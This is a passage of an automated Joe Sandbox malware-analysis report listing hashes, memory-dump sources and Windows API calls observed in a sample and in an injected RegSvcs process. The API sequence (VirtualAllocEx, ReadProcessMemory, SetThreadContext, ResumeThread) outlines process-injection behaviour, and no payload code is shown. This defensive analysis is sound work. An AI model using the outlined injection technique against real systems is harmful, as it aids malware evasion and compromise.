                            • Opcode Fuzzy Hash: abfaea5cd5ee179539b26df75579cc026824a172b8f1bfda42d42cb87608f313
                            • Instruction Fuzzy Hash: 402128B19002098FDB10DFAAC485BEEBBF5FF88314F14842AD519A7245CB78A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0788D7E8
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 33fe0578fcbfe892a7c55369aa9c51dc9315aa37305cd454c37786df7b5d6565
                            • Instruction ID: 2483672874b8615f5ee3a3577c2a4067f01ab41ac677f86d4fcaf9d2d461b763
                            • Opcode Fuzzy Hash: 33fe0578fcbfe892a7c55369aa9c51dc9315aa37305cd454c37786df7b5d6565
                            • Instruction Fuzzy Hash: 7E2128B1D002499FDB10DFAAC985AEEFBF5FF88310F508429E519A7240C738A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0154DA97
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: b09fac24e326a01ac3ba6d49666c0fe802c1d7396484fa7ff7b7fc144c2a8dba
                            • Instruction ID: af20ad9d5c1bdd9f2afd25f5a71cfb40d452898dc946389752a1842b3fd09702
                            • Opcode Fuzzy Hash: b09fac24e326a01ac3ba6d49666c0fe802c1d7396484fa7ff7b7fc144c2a8dba
                            • Instruction Fuzzy Hash: A721E3B5901208AFDB10CFAAD584AEEFBF5FB48310F14841AE918A7310C379A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0788D7E8
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: cf4c2b8b7bd69c7cad7ca2b0ee522cb730f6d51019c61fba9c1431c760c13547
                            • Instruction ID: fad6f1c84b8784f12f30e4e27a6947d57bfab708ac92727e280b4c1020c0469b
                            • Opcode Fuzzy Hash: cf4c2b8b7bd69c7cad7ca2b0ee522cb730f6d51019c61fba9c1431c760c13547
                            • Instruction Fuzzy Hash: BA2138B1D003499FCB10DFAAC884AEEFBF5FF48310F50842AE519A7240C7389944CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0788CCEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 96d3916d47eb4c2933d423ff53fefb40e19f47526859716392e9300c3f900b09
                            • Instruction ID: 18a09be2f0acbd7edd605740fa2c56b02170b4e7156c13f9320a862d19ed1176
                            • Opcode Fuzzy Hash: 96d3916d47eb4c2933d423ff53fefb40e19f47526859716392e9300c3f900b09
                            • Instruction Fuzzy Hash: 9A2118B19002098FDB10DFAAC4857EEBBF5EF48324F148429D519A7241CB789945CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0154DA97
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: ce69eac75018ce7bdf97662b1b4ff3319d15b355de1882fa9a8b02b6c357776e
                            • Instruction ID: 86f697655ec42a90f285b2ae95ae4b5e829b5540f86e563f667df6c94dc78443
                            • Opcode Fuzzy Hash: ce69eac75018ce7bdf97662b1b4ff3319d15b355de1882fa9a8b02b6c357776e
                            • Instruction Fuzzy Hash: 3521D5B59002499FDB10CF9AD584ADEFFF9FB48310F14841AE918A7350D378A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0788D1EE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: b8f1353aaa94588ec88a3200a2443af1b513a1a1ff4ac5020ea934ce2892e42a
                            • Instruction ID: ad8a3296e015e3d135c4febce3d9a663b9faa8e00665dcef14ca76ded32db015
                            • Opcode Fuzzy Hash: b8f1353aaa94588ec88a3200a2443af1b513a1a1ff4ac5020ea934ce2892e42a
                            • Instruction Fuzzy Hash: D02159B59002499FCB10DFAAC844BEEFBF5FF88320F148819E519A7250C739A541CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0154B3F9,00000800,00000000,00000000), ref: 0154B60A
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 16e8f88e68e4927c1cde6ee2e602cdf11f5f5baeffa25acbc16cfc50c0e1bb2e
                            • Instruction ID: 77838b310bebbc9369896be364e7effe835fc86145abdf8d8396e6582724d792
                            • Opcode Fuzzy Hash: 16e8f88e68e4927c1cde6ee2e602cdf11f5f5baeffa25acbc16cfc50c0e1bb2e
                            • Instruction Fuzzy Hash: 9111D3B69002099FDB24DF9AC444AEEFBF4FB88714F14842AD519A7200D379A545CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0788D1EE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: fdc5b0b45f67f67c4eb8e00144edc1e7eada91d12aa808d52f26a5917aa9bd9c
                            • Instruction ID: 56b16323007e975e5a5c1400b79054de4422f2dcba7a23538394e447c9d7e000
                            • Opcode Fuzzy Hash: fdc5b0b45f67f67c4eb8e00144edc1e7eada91d12aa808d52f26a5917aa9bd9c
                            • Instruction Fuzzy Hash: 481126B59002499FCB10DFAAC844AEEFBF5EF88320F108419E519A7250C779A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0154B3F9,00000800,00000000,00000000), ref: 0154B60A
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: a6a2027fdc84749a870976333a9257b93a7a4c80900687ccf1ef64b04faacedd
                            • Instruction ID: 5b474cee7be46f6a0a9577b513c8821b1a078544ab2a67cc1f38927a8e2360c0
                            • Opcode Fuzzy Hash: a6a2027fdc84749a870976333a9257b93a7a4c80900687ccf1ef64b04faacedd
                            • Instruction Fuzzy Hash: BE1123B6C002098FDB24CFAAD548ADEFBF5FB88314F10842AD519B7610C379A644CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: de7762ac58f390d22614c34739d67eb30ea06c28e4147a224eb30c3631152965
                            • Instruction ID: 7c0729fc66583f3852c014e719af251ddf0be76ebffa41b7a71aac3709415bc5
                            • Opcode Fuzzy Hash: de7762ac58f390d22614c34739d67eb30ea06c28e4147a224eb30c3631152965
                            • Instruction Fuzzy Hash: D0116AB1C002498FDB20DFAAC4457EEFBF5EF88324F20841AC519A7240C778A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 7474605fceacf39ce752102d58b58beeea2f306b19fa61e2586a0e515b61a163
                            • Instruction ID: 8d4efa4439d3a180511a8362392ff09a1ff430ce9a1a41c6c22ca9a5e29f6281
                            • Opcode Fuzzy Hash: 7474605fceacf39ce752102d58b58beeea2f306b19fa61e2586a0e515b61a163
                            • Instruction Fuzzy Hash: FD113AB1D002498FCB20DFAAC4457EEFBF5EF88324F208419D519A7240CB79A544CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,?,?,?), ref: 0EFF1665
                            Memory Dump Source
                            • Source File: 00000008.00000002.2146047318.000000000EFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EFF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_eff0000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: f7f3f2e83fe5930c2c067834db10b208bfb2a6c25611ccc178af839c2e81ab43
                            • Instruction ID: e6b7bc9e4d0441016d7373b4799bad64c99ef3f08e01309f516c205c27d8e99b
                            • Opcode Fuzzy Hash: f7f3f2e83fe5930c2c067834db10b208bfb2a6c25611ccc178af839c2e81ab43
                            • Instruction Fuzzy Hash: 3E11F2B5800349DFCB10DF9AC999BDEBBF8EB49720F14841AE518A7211C379A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0154B37E
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 807e7108a0328a9e20138c28d3ae4794307b819b98f74a696353791f2e964f31
                            • Instruction ID: 3871da734f72010f6139e7f56cbaaab498990fa8ad6fa61a3cee7ad2fef7d66e
                            • Opcode Fuzzy Hash: 807e7108a0328a9e20138c28d3ae4794307b819b98f74a696353791f2e964f31
                            • Instruction Fuzzy Hash: CF11DFB5C002498FDB24DF9AC444A9EFBF4FB88614F10841AD929A7210C379A545CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,?,?,?), ref: 0EFF1665
                            Memory Dump Source
                            • Source File: 00000008.00000002.2146047318.000000000EFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EFF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_eff0000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 5dc9c4c075f2aea8d4a6939de12bb48a36a1e7edb42e048a95acc3ad131a664d
                            • Instruction ID: e8c84070073b2e25659663209a81c6fee8b1389a45ebe9e1a4bb3b48680dea09
                            • Opcode Fuzzy Hash: 5dc9c4c075f2aea8d4a6939de12bb48a36a1e7edb42e048a95acc3ad131a664d
                            • Instruction Fuzzy Hash: 1011D0B5800349DFDB10DF9AC989BDEFBF8EB48720F14841AE518A7211C379A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2b6fd685c49ac22da06ec00b9742040ab3be1a455fda9a4073a6b336cac857a
                            • Instruction ID: 3d149a97414d1496eb0b3a4bd8cd9cbb2bbd22c381beae3f5bcad335f6e87fbc
                            • Opcode Fuzzy Hash: d2b6fd685c49ac22da06ec00b9742040ab3be1a455fda9a4073a6b336cac857a
                            • Instruction Fuzzy Hash: A121F471900240DFDB05DF58D984B27BFA5FB88319F20C56AD9090A266C336D416CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c6b20f200477389a6490978ac8ac0f4bc89ed8ec5b6a6f22a75bb419ad58665
                            • Instruction ID: 060c614b5eea12301bd71c89bca32ffa1a9cd42a1497a93cbd6a8c729dc7611c
                            • Opcode Fuzzy Hash: 8c6b20f200477389a6490978ac8ac0f4bc89ed8ec5b6a6f22a75bb419ad58665
                            • Instruction Fuzzy Hash: C7210871900204DFDB05DF54D9C4B57BFA5FBA4315F20C57AD9090B366C33AE456CAA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 30123cb4dc4a9ca83225ed329e0bab3be4eb130e106836371b8bf2666107ffa7
                            • Instruction ID: 9c3b51111aa506c74b222bdbb219c232e1960ed056037b852b77b5addf2a4355
                            • Opcode Fuzzy Hash: 30123cb4dc4a9ca83225ed329e0bab3be4eb130e106836371b8bf2666107ffa7
                            • Instruction Fuzzy Hash: FA21F5B1904204DFDB15DF68D984B16BF65FB84358F20C56EDA0A4B366C33AD407CA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88a15618b816fff7a327c094e9d25f6790264fb42ff26c7743dab7a258157fbd
                            • Instruction ID: c5a9752ac843402543d7256dc1234dfa2763d8f5aa3404708d064983e886f745
                            • Opcode Fuzzy Hash: 88a15618b816fff7a327c094e9d25f6790264fb42ff26c7743dab7a258157fbd
                            • Instruction Fuzzy Hash: BE210775904204DFDB05DF98D9C0F26BB65FB84324F20C56EDA094B366C33AD406CAA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b9b91d5a0b6d29bdd3192348528539be7ceea700f57cc6d7dd91b1e5908d8759
                            • Instruction ID: 92b11347fb5bbe8cd86dc727de34946a045461bf44089191b299ee1ed4984a44
                            • Opcode Fuzzy Hash: b9b91d5a0b6d29bdd3192348528539be7ceea700f57cc6d7dd91b1e5908d8759
                            • Instruction Fuzzy Hash: 6D217F755093808FDB07CF24D594716BF71EB46218F28C5EAD9498B7A7C33A980ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: ece6305b994b0ee47d02620bf69e0708c51d8c3360ae735cad7a17de8fa4a5dc
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 8711D276804240CFDB02CF44D5C4B56BFB1FB94314F24C6AAD9490B267C33AD456CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: bdba0f2de526536ea5f19cb0adc31fe9deef51145ee8a699610715d3bc5f3a41
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 0911B176904280CFDB16CF54D9C4B16BFB1FB88314F24C6AAD9490B667C336D45ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction ID: a8eff1e04315feab8b3f4ae8f5be954c5d67cf86a14e8c300812fe8115819dd8
                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction Fuzzy Hash: 4C11BE79904240DFDB02CF54C5C4B16BF61FB84224F24C6AED9494B366C33AD40ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 003aefc496d3f7cd03b9094b55f79cdf812baaf2ea2dea1591b204d1a01e00c2
                            • Instruction ID: e13515f98d3ac9574b8c48c6187e3e28f9faef27aefe22a0e800d370617301e8
                            • Opcode Fuzzy Hash: 003aefc496d3f7cd03b9094b55f79cdf812baaf2ea2dea1591b204d1a01e00c2
                            • Instruction Fuzzy Hash: 51012B314443809AE7209F99CD88B67FFDCEF45321F18C52BED490A3A6D2399841CAB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23ba8e17d3e25bb4fa8a1fcd7f7aafc880c5377e07e6b52cec222a0db597c4ab
                            • Instruction ID: 9beaa7baf785af9b3b0f46eeac0fa71b46406d2e47a9bab539314d593299990f
                            • Opcode Fuzzy Hash: 23ba8e17d3e25bb4fa8a1fcd7f7aafc880c5377e07e6b52cec222a0db597c4ab
                            • Instruction Fuzzy Hash: 67F0C2714043849AE7108F1AC888B63FFD8EF85635F18C45AED484A396C2799840CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage: 12.1%
                            Dynamic/Decrypted Code Coverage: 100%
                            Signature Coverage: 0%
                            Total number of Nodes: 29
                            Total number of Limit Nodes: 5
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 665dea7de9f32fd40af2264f8410bf9b84b439b42e52a88c336774cc949daef9
                            • Instruction ID: 231b8c2e6d2a9d20934a7de29222b7baf1df205960c7a4aabf663f72a381e264
                            • Opcode Fuzzy Hash: 665dea7de9f32fd40af2264f8410bf9b84b439b42e52a88c336774cc949daef9
                            • Instruction Fuzzy Hash: E8630A31D10B1A8EDB11EF68C9906ADF7B1FF99300F15D69AE44867221EB70AAD4CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: ee51ce86a56c47b3e9824a5ba4397f2b9ddce4729528eaccfc1d067d6a4b7c14
                            • Instruction ID: cd5417819a580601cd5c2b081833efb906c0c07a6345edb22c11e19a485f65b1
                            • Opcode Fuzzy Hash: ee51ce86a56c47b3e9824a5ba4397f2b9ddce4729528eaccfc1d067d6a4b7c14
                            • Instruction Fuzzy Hash: 81B16F70E1025ADFDF10DFADC9817ADBBF2AF88314F148129D919E7254EB749885CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 603dfc94a939c46407f0de115d21834329723926a79f318f4abec6f994d8d6c7
                            • Instruction ID: a1f5f66d1169d535451144de84ecdcedfa9570dcb1f2c52d021204d1961e8ffb
                            • Opcode Fuzzy Hash: 603dfc94a939c46407f0de115d21834329723926a79f318f4abec6f994d8d6c7
                            • Instruction Fuzzy Hash: E291A270E1025AEFDF14DFA8D9817DDBBF2BF98304F248129E505A7254DB789886CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57403622dd3778b89b730af39173ce112e99f3eec7686404c326b5c756690bfe
                            • Instruction ID: 471b0fc4122ead6e3ea378974f5e41c41cde269adf4ae017eaf06fbe54e3199f
                            • Opcode Fuzzy Hash: 57403622dd3778b89b730af39173ce112e99f3eec7686404c326b5c756690bfe
                            • Instruction Fuzzy Hash: 24332031D1071A9ECB11EF68C8906ADF7B1FF99300F15C79AD449A7221EB70AAD5CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa2978ada8695527f37b861e8df32723d8f4d55687054458fa1631393357b1a3
                            • Instruction ID: 38e13a3be26cfdd5bdd86f1c4c5ac61fc57827b9ad98e74f83283fa9baaa81a6
                            • Opcode Fuzzy Hash: aa2978ada8695527f37b861e8df32723d8f4d55687054458fa1631393357b1a3
                            • Instruction Fuzzy Hash: 8A32A034A102269FDF14DF68D584AADBBB6FF88314F148569E909DB395DB30EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE222), ref: 062CE30F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3285125303.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_62c0000_RegSvcs.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: Te]q
                            • API String ID: 1890195054-52440209
                            • Opcode ID: e7420c9b46ce50c389c37e20b1338045e15bd2de189df37c9260a7326cf22497
                            • Instruction ID: 1ff4a5bd1d8198fb60510f077a5e840ee2471335ddce9091f9d7871984556cd3
                            • Opcode Fuzzy Hash: e7420c9b46ce50c389c37e20b1338045e15bd2de189df37c9260a7326cf22497
                            • Instruction Fuzzy Hash: 5D91B035E102198FDB24DFA9C4807ADB7B2EF89314F214629E845EB355CB35EC86CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3285125303.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_62c0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS
                            • API String ID: 0-647291951
                            • Opcode ID: b092cabd3f5858aa70e00dbef48f4ba062f8be0597443b72f4a7286ca3a41b0d
                            • Instruction ID: 9dc9021c9abb07cde8965d22a388e2a7562269b2fc9dab17eb8b2b7fb42ae80c
                            • Opcode Fuzzy Hash: b092cabd3f5858aa70e00dbef48f4ba062f8be0597443b72f4a7286ca3a41b0d
                            • Instruction Fuzzy Hash: 7B412572D103568FCB14DFB9D8502EEBBF5EF89320F05866AD848A7241DB78A845CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE222), ref: 062CE30F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3285125303.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_62c0000_RegSvcs.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: kfS
                            • API String ID: 1890195054-647291951
                            • Opcode ID: 66d5032d3a7f1ef1aa4f0c935db5c95fa1742f8182a2f6b975b8fac668d3c200
                            • Instruction ID: 2613445303ae329ceb0f996c9cea1b9f5e80a831dd82b6dc321c005d44776f7e
